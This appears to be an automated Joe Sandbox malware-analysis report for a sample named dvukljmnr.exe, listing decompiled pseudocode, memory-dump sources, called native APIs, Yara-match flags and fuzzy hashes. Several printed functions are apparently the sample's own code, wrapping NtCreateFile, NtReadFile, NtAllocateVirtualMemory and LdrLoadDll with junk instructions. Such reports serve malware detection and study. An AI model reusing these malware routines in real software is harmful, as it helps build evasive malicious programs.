                                                          0x00000000
                                                          0x009c2279
                                                          0x009c228b
                                                          0x009c228b
                                                          0x009c2277
                                                          0x009c22c2
                                                          0x009c22c6
                                                          0x009c2256
                                                          0x009c226e
                                                          0x009c226e
                                                          0x009c2254

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                          • String ID:
                                                          • API String ID: 3016257755-0
                                                          • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                          • Instruction ID: 17e066fa11468b813839086f4db12a5240bf5f19a64551474df990d6bf1a586b
                                                          • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                          • Instruction Fuzzy Hash: 5E01403280014ABBCF165F84DC41EEE3F26BF29354F588519FE2858035D736C9B1AB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A5765 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 83%
                                                          			E009A5765(signed int __ebx) {
				signed int _t9;
				signed int _t10;
				void* _t19;
				void* _t21;
				void* _t22;
				signed int _t24;
				void* _t25;
				void* _t27;

				_pop(_t27);
				asm("cld");
				if(__ebx >= 0x3fffffff) {
					L6:
					_t10 = _t9 | 0xffffffff;
				} else {
					_t9 =  *(_t27 - 8);
					if(_t9 >= 0x7fffffff) {
						goto L6;
					} else {
						_t19 = _t9 + __ebx * 2;
						_t9 = _t9 + _t9;
						_t20 = _t19 + _t19;
						if(_t19 + _t19 < _t9) {
							goto L6;
						} else {
							_t9 = E009B22C8(_t22, _t20);
							_t24 = _t9;
							_pop(_t21);
							if(_t24 == 0) {
								goto L6;
							} else {
								E009B1127(_t21, _t25, _t24, _t24 + __ebx * 4, _t27 - 4, _t27 - 8);
								 *0x9cf204 = _t24;
								 *0x9cf1fc =  *((intOrPtr*)(_t27 - 4)) - 1;
								_t10 = 0;
							}
						}
					}
				}
				return _t10;
			}











                                                          0x009b10c5
                                                          0x009b10c6
                                                          0x009b10d0
                                                          0x009b111d
                                                          0x009b111d
                                                          0x009b10d2
                                                          0x009b10d2
                                                          0x009b10da
                                                          0x00000000
                                                          0x009b10dc
                                                          0x009b10dc
                                                          0x009b10df
                                                          0x009b10e1
                                                          0x009b10e5
                                                          0x00000000
                                                          0x009b10e7
                                                          0x009b10e8
                                                          0x009b10ed
                                                          0x009b10ef
                                                          0x009b10f2
                                                          0x00000000
                                                          0x009b10f4
                                                          0x009b1102
                                                          0x009b110e
                                                          0x009b1114
                                                          0x009b1119
                                                          0x009b1119
                                                          0x009b10f2
                                                          0x009b10e5
                                                          0x009b10da
                                                          0x009b1126

                                                          APIs
                                                          • __malloc_crt.LIBCMT ref: 009B10E8
                                                            • Part of subcall function 009B22C8: _malloc.LIBCMT ref: 009B22D9
                                                          • _wparse_cmdline.LIBCMT ref: 009B1102
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\dvukljmnr.exe, xrefs: 009B1101
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: __malloc_crt_malloc_wparse_cmdline
                                                          • String ID: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe
                                                          • API String ID: 197901045-1441584134
                                                          • Opcode ID: 1aec98f599be023b9ef007531b6da91313f0c09784e8d9e35e4d927862a697c4
                                                          • Instruction ID: 78e3c0c2fb494c55cc83f3b5c049f9327aeccdbff389aa7e0fd6c011314af9f5
                                                          • Opcode Fuzzy Hash: 1aec98f599be023b9ef007531b6da91313f0c09784e8d9e35e4d927862a697c4
                                                          • Instruction Fuzzy Hash: D9F09676904009ABCB08DFACD9A1CFEB3ACEA413747E006A7E526C3151EA3596618F61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A50DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E009A50DD(void* __eax, signed int* __esi) {
				void* _t4;
				signed int _t10;
				struct _CRITICAL_SECTION* _t12;
				signed int* _t13;

				_t13 = __esi;
				_t4 = __eax;
				while(1) {
					_t13 =  &(_t13[1]);
					if(_t13 >= 0x9cf330) {
						break;
					}
					_t10 =  *_t13;
					if(_t10 != 0) {
						if(_t10 < _t10 + 0x800) {
							_t12 = _t10 + 0xc;
							do {
								if( *((intOrPtr*)(_t12 - 4)) != 0) {
									DeleteCriticalSection(_t12);
								}
								_t12 = _t12 + 0x40;
							} while (_t12 - 0xc <  *_t13 + 0x800);
						}
						_t4 = E009B2248( *_t13);
						 *_t13 =  *_t13 & 0x00000000;
					}
				}
				return _t4;
			}







                                                          0x009a50dd
                                                          0x009a50dd
                                                          0x009b105e
                                                          0x009b105e
                                                          0x009b1067
                                                          0x00000000
                                                          0x00000000
                                                          0x009b1021
                                                          0x009b1025
                                                          0x009b102f
                                                          0x009b1031
                                                          0x009b1034
                                                          0x009b1038
                                                          0x009b103b
                                                          0x009b103b
                                                          0x009b1043
                                                          0x009b104f
                                                          0x009b1034
                                                          0x009b1055
                                                          0x009b105a
                                                          0x009b105d
                                                          0x009b1025
                                                          0x009b106b

                                                          APIs
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\dvukljmnr.exe, xrefs: 009B1061
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: CriticalDeleteSection_free
                                                          • String ID: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe
                                                          • API String ID: 1883507540-1441584134
                                                          • Opcode ID: d87785c3017b3014c40f969a645ac21821701722ed448140520681ad4c5e52d9
                                                          • Instruction ID: 23a35482d59bcd40922a57d0ed7d8301edaa49ca91ecab60d6d9527fd34fae4f
                                                          • Opcode Fuzzy Hash: d87785c3017b3014c40f969a645ac21821701722ed448140520681ad4c5e52d9
                                                          • Instruction Fuzzy Hash: 83F0657690004287D778BF04E9D07E8F3A6FB90371FA6493ED49697150DB3559C58A81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          Function 0041A3FB Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38filenativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 41a3fb-41a449 call 41af50 NtReadFile
                                                          APIs
                                                          • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: !JA$bMA$bMA
                                                          • API String ID: 2738559852-4222312340
                                                          • Opcode ID: bbedcce165141eae6f6c59c4a2154509f4d526a624f79bebf9a1775ec944f995
                                                          • Instruction ID: 49720b7d66a93349e3bd369c002c8e5e6a417abb72e5e273f09933de7181dcef
                                                          • Opcode Fuzzy Hash: bbedcce165141eae6f6c59c4a2154509f4d526a624f79bebf9a1775ec944f995
                                                          • Instruction Fuzzy Hash: E7F0F4B6200208AFCB14DF89CC91EEB77A9EF8C714F168259FE1D97241D630E811CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041A400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 3 41a400-41a416 4 41a41c-41a449 NtReadFile 3->4 5 41a417 call 41af50 3->5 5->4
                                                          C-Code - Quality: 37%
                                                          			E0041A400(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AF50(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x414a21
				_t6 =  &_a32; // 0x414d62
				_t12 =  &_a8; // 0x414d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                                          0x0041a403
                                                          0x0041a40f
                                                          0x0041a417
                                                          0x0041a41c
                                                          0x0041a422
                                                          0x0041a43d
                                                          0x0041a445
                                                          0x0041a449

                                                          APIs
                                                          • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: !JA$bMA$bMA
                                                          • API String ID: 2738559852-4222312340
                                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                          • Instruction ID: 27817754ac388b25b847a3362b671b2e44b934df7eae6808a762aa4d31f9cf83
                                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                          • Instruction Fuzzy Hash: 93F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 244 40ace0-40acfc 245 40ad04-40ad09 244->245 246 40acff call 41cc40 244->246 247 40ad0b-40ad0e 245->247 248 40ad0f-40ad1d call 41d060 245->248 246->245 251 40ad2d-40ad30 248->251 252 40ad1f-40ad2a call 41d2e0 248->252 254 40ad36-40ad3e 251->254 255 40ad31 call 41b490 251->255 252->251 257 40ad40-40ad54 LdrLoadDll 254->257 258 40ad57-40ad5a 254->258 255->254 257->258
                                                          C-Code - Quality: 70%
                                                          			E0040ACE0(void* __eflags, void* _a4, signed char _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				intOrPtr _t28;
				void* _t30;
				void* _t31;
				void* _t32;

				_t24 = _a8;
				_v8 =  &_v536;
				_t15 = E0041CC40( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_push(_v8);
					_t17 = E0041D060(_t24, __eflags);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D2E0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t28 = _v8;
					asm("cld");
					_t18 = E0041B490(_t28);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}














                                                          0x0040ace9
                                                          0x0040acfc
                                                          0x0040acff
                                                          0x0040ad04
                                                          0x0040ad09
                                                          0x0040ad12
                                                          0x0040ad13
                                                          0x0040ad18
                                                          0x0040ad1b
                                                          0x0040ad1d
                                                          0x0040ad25
                                                          0x0040ad2a
                                                          0x0040ad2a
                                                          0x0040ad2d
                                                          0x0040ad2f
                                                          0x0040ad31
                                                          0x0040ad39
                                                          0x0040ad3c
                                                          0x0040ad3e
                                                          0x0040ad52
                                                          0x00000000
                                                          0x0040ad54
                                                          0x0040ad5a
                                                          0x0040ad0e
                                                          0x0040ad0e
                                                          0x0040ad0e

                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                          • Instruction ID: d499f532a4605d4acc668fd39ab8700ce4e6b27de0f8ef54b1fb0fb48fae0bb4
                                                          • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                          • Instruction Fuzzy Hash: EF0152B5D4020DA7DB10EBA5DC42FDEB3789F14308F0041A5E908A7281F634EB54CB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041A34A Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 259 41a34a-41a3a1 call 41af50 NtCreateFile
                                                          C-Code - Quality: 64%
                                                          			E0041A34A(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				asm("popfd");
				asm("repe sbb byte [ebp-0x74aaa25a], 0xec");
				_t15 = _a4;
				_t3 = _t15 + 0xc40; // 0xc40
				E0041AF50(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                          0x0041a34a
                                                          0x0041a34b
                                                          0x0041a353
                                                          0x0041a35f
                                                          0x0041a367
                                                          0x0041a39d
                                                          0x0041a3a1

                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 2a99a3c2f4766e3ff7701aeb918381754f39925105fc95cd78374fa7f9cf15e1
                                                          • Instruction ID: 5d37e0bc2e5497f3ba9e256379f8536d62525a8f8307c94596b62d97346bd883
                                                          • Opcode Fuzzy Hash: 2a99a3c2f4766e3ff7701aeb918381754f39925105fc95cd78374fa7f9cf15e1
                                                          • Instruction Fuzzy Hash: 5F01B2B2201108AFCB18CF99DC85EEB77A9AF8C754F15824CFA5D97291C630E851CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041A350 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 262 41a350-41a366 263 41a36c-41a3a1 NtCreateFile 262->263 264 41a367 call 41af50 262->264 264->263
                                                          C-Code - Quality: 100%
                                                          			E0041A350(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AF50(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                          0x0041a35f
                                                          0x0041a367
                                                          0x0041a39d
                                                          0x0041a3a1

                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                          • Instruction ID: 880687b14e2bfdcefdfb108c829fe1d34a34742feba638e3287dae326a4d6923
                                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                          • Instruction Fuzzy Hash: AAF0BDB2201208AFCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041A530 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 265 41a530-41a56d call 41af50 NtAllocateVirtualMemory
                                                          C-Code - Quality: 100%
                                                          			E0041A530(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AF50(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                          0x0041a53f
                                                          0x0041a547
                                                          0x0041a569
                                                          0x0041a56d

                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                          • Instruction ID: 4e0f78fd3c2c10b6dba7ecb12144fed22081eaa1fb7babd41561f41a61d0d9a2
                                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                          • Instruction Fuzzy Hash: A3F015B2200208AFCB14DF89CC81EEB77ADAF88754F118149BE1C97241C630F811CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041A47B Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 271 41a47b-41a4a9 call 41af50 NtClose
                                                          C-Code - Quality: 43%
                                                          			E0041A47B(intOrPtr _a8, void* _a12) {
				long _t8;
				void* _t11;

				_pop(_t11);
				asm("popfd");
				asm("daa");
				asm("insd");
				asm("fcom qword [ebp-0x75]");
				_t5 = _a8;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a933
				E0041AF50(_t11, _a8, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a12); // executed
				return _t8;
			}





                                                          0x0041a47b
                                                          0x0041a47c
                                                          0x0041a47d
                                                          0x0041a47e
                                                          0x0041a47f
                                                          0x0041a483
                                                          0x0041a486
                                                          0x0041a48f
                                                          0x0041a497
                                                          0x0041a4a5
                                                          0x0041a4a9

                                                          APIs
                                                          • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 96694a41f84103a2750570f19915e235cc2157ad943ab8566f94040f6eab9b6e
                                                          • Instruction ID: 224f3cab7641eba9fa5498746abd3f9922e224dbb1b3f46e5902b56a1c4f2db2
                                                          • Opcode Fuzzy Hash: 96694a41f84103a2750570f19915e235cc2157ad943ab8566f94040f6eab9b6e
                                                          • Instruction Fuzzy Hash: 04E08C75600200ABD720DFA9CC86EEB7B68EF84364F104199BA1DEB242C630A50186A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041A480 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0041A480(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a933
				E0041AF50(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                          0x0041a483
                                                          0x0041a486
                                                          0x0041a48f
                                                          0x0041a497
                                                          0x0041a4a5
                                                          0x0041a4a9

                                                          APIs
                                                          • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_400000_dvukljmnr.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                          • Instruction ID: 58703de6d0d09b45194c1a78dafb6a6614d70e6a8447524affba2eb7b0ba4c9c
                                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                          • Instruction Fuzzy Hash: E9D01776200214ABD710EB99CC85EE77BACEF48764F154499BA1C9B242C530FA1086E4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00A000C4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                          • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                          • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                          • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00A00078 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984283870.0000000000AE7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984289521.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984326505.0000000000B50000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9e0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                          • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                          • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                          • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00A00048 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984109714.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                                                          • Associated: 00000006.00000002.984102532.00000000009E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984259252.0000000000AD0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984268876.0000000000AE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000006.00000002.984275697.0000000000AE4000.00000040.00000800.00020000.00000000.sdmpDownload File
